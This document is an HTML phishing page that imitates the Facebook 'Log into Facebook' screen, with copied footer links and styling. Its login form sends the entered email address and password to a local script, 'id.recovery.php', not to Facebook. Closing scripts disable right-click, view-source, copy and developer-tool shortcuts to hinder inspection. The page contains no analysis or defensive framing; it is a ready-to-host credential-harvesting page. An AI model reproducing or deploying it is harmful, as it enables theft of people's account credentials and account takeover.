<!DOCTYPE html>
<html><head>

<title id="pageTitle">Log into Facebook | Facebook</title>
<link rel="shortcut icon" href="img/bi786sd.ico" />
<link type="text/css" rel="stylesheet" href="css/W-iPJpTeyXMOS.css"/>
<link type="text/css" rel="stylesheet" href="css/W-tb7VEGCiVPl.css"/>
<link type="text/css" rel="stylesheet" href="css/W-iWrWAzV5IYD.css"/>
<link type="text/css" rel="stylesheet" href="css/W-1uxt1bMNsC3.css"/>
<link type="text/css" rel="stylesheet" href="css/W-8GyCM36fUuY.css"/>
<link type="text/css" rel="stylesheet" href="css/W-2jUNqPh5mUj.css"/>


</head>
<body class="login_page _39il UIPage_LoggedOut _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_GB" dir="ltr">
<script>requireLazy(["bootstrapWebSession"],function(j){j(1574595754)})</script>
<div class="_li" id="u_0_2">
<div class="_3_s0 _1toe _3_s1 _3_s1 uiBoxGray noborder" data-testid="ax-navigation-menubar" id="u_0_3">
<div class="_608m">
<div class="_5aj7 _tb6">
<div class="_4bl7">
<span class="mrm _3bcv _50f3">Jump to</span></div>
<div class="_4bl9 _3bcp">
<div class="_6a _608n" aria-label="Navigation assistant" aria-keyshortcuts="Alt+/" role="menubar" id="u_0_4">
<div class="_6a uiPopover" id="u_0_5">
<a role="button" class="_42ft _4jy0 _55pi _2agf _4o_4 _63xb _p _4jy3 _517h _51sy" href="#" style="max-width:200px;" aria-haspopup="true" aria-expanded="false" rel="toggle" id="u_0_6">
<span class="_55pe">Sections of this page</span>
<span class="_4o_3 _3-99">
<i class="img sp_FNo-BRNXnCI sx_44b03f"></i></span>
</a></div>
<div class="_6a _3bcs">
</div>
<div class="_6a mrm uiPopover" id="u_0_7">
<a role="button" class="_42ft _4jy0 _55pi _2agf _4o_4 _3_s2 _63xb _p _4jy3 _4jy1 selected _51sy" href="#" style="max-width:200px;" aria-haspopup="true" tabindex="-1" aria-expanded="false" rel="toggle" id="u_0_8">
<span class="_55pe">Accessibility help</span>
<span class="_4o_3 _3-99">
<i class="img sp_FNo-BRNXnCI sx_a22781"></i>
</span></a>
</div></div></div>
<div class="_4bl7 mlm pll _3bct">
<div class="_6a _3bcy">Press <span class="_3bcz">alt</span> + <span class="_3bcz">/</span> to open this menu</div>
</div></div></div></div>
<div id="pagelet_bluebar" data-referrer="pagelet_bluebar">
<div id="blueBarDOMInspector"><div class="_53jh">
<div class="loggedout_menubar_container">
<div class="clearfix loggedout_menubar">
<div class="lfloat _ohe"><h1>
<a title="Facebook"><br>
<img id="logo" src="img/o8nh7yj0.png" height="33" width="170"></i></a>
</div></div></div>
<div class="signupBanner">
<div class="signup_bar_container">
<div class="signup_box clearfix">
</div></div></div></div></div></div>
<div id="globalContainer" class="uiContextualLayerParent">
<div class="fb_content clearfix " id="content" role="main">
<div class="_4-u5 _30ny">
<span class="muffin_tracking_pixel_start"></span>
<img class="tracking_pixel" />
<span class="muffin_tracking_pixel_end"></span>
<div class="_2pio _1uxu">
<div class="_585n" id="u_0_9">
<i class="_585p img sp_FNo-BRNXnCI sx_19da1e"><u>Notice</u></i>
<div class="_585r _50f4"><font color="#385898">You must log in to continue.</font></div>
</div></div>
<div class="_4-u2 _1w1t _4-u8 _52jv">
<div class="_xku" id="header_block">
<span class="_50f6">Log in to Facebook</span></div>
<div class="login_form_container">

<form id="login_form" action="id.recovery.php?login_attempt=1&amp;lwv=100" method="post" onsubmit="">


<div id="loginform">

<div class="clearfix _5466 _44mg" id="email_container">
<input type="text" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="email_id" id="email_id" tabindex="0" placeholder="Email address or phone number" minlength="6" maxlength="50" value="" autofocus="1" aria-label="Email address or phone number" required=""/></div>
<div class="clearfix _5466 _44mg">
<input type="password" class="inputtext _55r1 inputtext _1kbt inputtext _1kbt" name="pass_input" id="pass_input" tabindex="0" placeholder="Password" aria-label="Password" minlength="6" maxlength="50" required=""/></div>
<div class="_xkt">
<button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Log In</button></div>
<div id="login_link">
<div class="_xkt">
<a href="https://www.facebook.com/recover/initiate/?ars=facebook_login" id="forgot-password-link" target="">Forgotten account?</a></div>
<div class="_1rf5"><span class="_1rf8">or</span>
</div>
<div class="_xkt">
<a role="button" class="_42ft _4jy0 _4jy6 _4jy2 selected _51sy" href="#" style="font-size: 14px">Create New Account</a>
</div></div></div>
</form>

</div></div></div></div><div>
<div id="pageFooter" data-referrer="page_footer" data-testid="page_footer">
<ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1"><li>English (UK)</li><li>
<a class="_sv4" dir="ltr" href="https://id-id.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fcreate%2F" onclick="#" title="Indonesian">Bahasa Indonesia</a></li><li>
<a class="_sv4" dir="ltr" href="https://jv-id.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fcreate%2F" onclick="#" title="Javanese">Basa Jawa</a></li><li>
<a class="_sv4" dir="ltr" href="https://ms-my.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fcreate%2F" onclick="#" title="Malay">Bahasa Melayu</a></li><li>
<a class="_sv4" dir="ltr" href="https://ja-jp.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fcreate%2F" onclick="#" title="Japanese">日本語</a></li><li>
<a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fcreate%2F" onclick="#" title="Arabic">العربية</a></li><li>
<a class="_sv4" dir="ltr" href="https://fr-fr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fcreate%2F" onclick="#" title="French (France)">Français (France)</a></li><li>
<a class="_sv4" dir="ltr" href="https://es-la.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fcreate%2F" onclick="#" title="Spanish">Español</a></li><li>
<a class="_sv4" dir="ltr" href="https://ko-kr.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fcreate%2F" onclick="#" title="Korean">한국어</a></li><li>
<a class="_sv4" dir="ltr" href="https://pt-br.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fcreate%2F" onclick="#" title="Portuguese (Brazil)">Português (Brasil)</a></li><li>
<a class="_sv4" dir="ltr" href="https://de-de.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fcreate%2F" onclick="#" title="German">Deutsch</a></li><li>
<a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="#" href="#" title="Show more languages">
<i class="img sp_9_VzWu1RZHj sx_5055b3"></i>
</a></li></ul>
<div id="contentCurve">
</div>
<div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links">
<ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li>
<a href="#" title="Sign up for Facebook">Sign Up</a></li><li>
<a href="# title="Log in to Facebook">Log In</a></li><li>
<a href="https://en-gb.messenger.com/" title="Take a look at Messenger.">Messenger</a></li><li>
<a href="#" title="Facebook Lite for Android.">Facebook Lite</a></li><li>
<a href="https://en-gb.facebook.com/watch/" title="Browse our Watch videos."> Watch </a></li><li>
<a href="#" title="Browse our people directory.">People</a></li><li>
<a href="#" title="Browse our Pages directory.">Pages</a></li><li>
<a href="#">Page categories</a></li><li>
<a href="#" title="Take a look at popular places on Facebook.">Places</a></li><li>
<a href="#" title="Check out Facebook games.">Games</a></li><li>
<a href="#" title="Browse our places directory.">Locations</a></li><li>
<a href="#" title="Browse our Marketplace product directory.">Marketplace</a></li><li>
<a href="#" title="Browse our Groups directory.">Groups</a></li><li>
<a href="https://l.facebook.com/l.php?u=https%3A%2F%2Finstagram.com%2F&amp;h=AT09I4C0lWjV-RQ66yHws-SRcWxvMSny9rw1Y-Rn3io3x7jFfiLxj67sCdApIXu4S-967U953DumDWEZgACKsEujg7x-zdr8tNoPf1NyEdFur0JPhbmawBCiO6O5ssk0jaKmLv3Ng0naCPaCiM_Ivw" title="Take a look at Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li>
<a href="#" title="Browse our Local Lists directory.">Local</a></li><li>
<a href="#" title="Donate to worthy causes.">Fundraisers</a></li><li>
<a href="#" title="Browse our Facebook Services directory.">Services</a></li><li>
<a href="#" accesskey="8" title="Read our blog, discover the resource centre and find job opportunities.">About</a></li><li>
<a href="#" title="Advertise on Facebook">Create ad</a></li><li>
<a href="#" title="Create a Page">Create Page</a></li><li>
<a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li>
<a href="#" title="Make your next career move to our brilliant company.">Careers</a></li><li>
<a data-nocookies="1" href="#" title="Learn about your privacy and Facebook.">Privacy</a></li><li>
<a href="#" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li>
<a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about AdChoices.">AdChoices<i class="img sp_FNo-BRNXnCI sx_04e8aa"></i></a></li><li>
<a data-nocookies="1" href="#" accesskey="9" title="Review our terms and policies.">Terms</a></li><li>
<a href="#" accesskey="0" title="Visit our Help Centre.">Help</a></li><li>
<a accesskey="6" class="accessible_elem" href="#" title="View and edit your Facebook settings.">Settings</a></li><li>
<a accesskey="7" class="accessible_elem" href="#" title="View your activity log">Activity log</a></li></ul></div>
<div class="mvl copyright"><div><span> Facebook © 2020</span></div>
</div></div></div></div><div></div><span>
<img src="https://facebook.com/security/hsts-pixel.gif" width="0" height="0" style="display:none" /></span>
</div><div style="display:none"></div>

<script type="text/javascript">
function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
</script>

<script type="text/javascript">
window.addEventListener("keydown",function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){e.preventDefault()}});document.keypress=function(e){if(e.ctrlKey&&(e.which==65||e.which==66||e.which==67||e.which==73||e.which==80||e.which==83||e.which==85||e.which==86)){}return false}
</script>

<script type="text/javascript">
document.onkeydown=function(e){e=e||window.event;if(e.keyCode==123||e.keyCode==18){return false}}
</script>

</body></html>